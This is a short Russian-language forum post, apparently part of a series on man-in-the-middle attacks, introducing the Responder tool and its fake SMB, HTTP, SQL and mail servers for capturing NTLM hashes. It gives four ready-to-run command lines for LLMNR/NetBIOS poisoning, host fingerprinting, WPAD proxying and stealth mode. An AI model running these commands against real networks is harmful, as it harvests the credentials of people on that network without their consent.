Атаки класса man-in- the-middle часть 2 с помощью Responder

Bad-Dag

Original poster
Member
Сообщения
9
Реакции
3
Посетить сайт
Responder – многофункциональный инструмент сбоевыми возможностями.
По своей сути это утилита для пассивного сбора чувствительных данных.

Responder – это в первую очередь пассивный инструмент, который внимательно слушает трафик на указанном
интерфейсе, анализирует и принимает соответствующие действия в зависимости от опций запуска.

Умеет извлекать NTLM v1 /v2 хеши, запуская для этого свой поддельный SMB сервер.
Так же содержит HTTP и SQL серверы, для схожих целей.
С последними обновлениями добавился целый ряд встроенных почтовых сервисов, таких как pop, imap и smtp.


Пример использования Responder для работы с протоколами NetBIOS и LLMNR:
responder -i Attacker_IP -I eth0


Пример использования Responder с включенным определением хостов:
responder -i Attacker_IP -I eth0 -f On


Пример использования Responder в качестве WPAD прокси:
responder -i Attacker_IP -I eth0 -f On -w


Cтелс режим работы Responder:
responder -i Attacker_IP -I eth0 -A
 

Название темы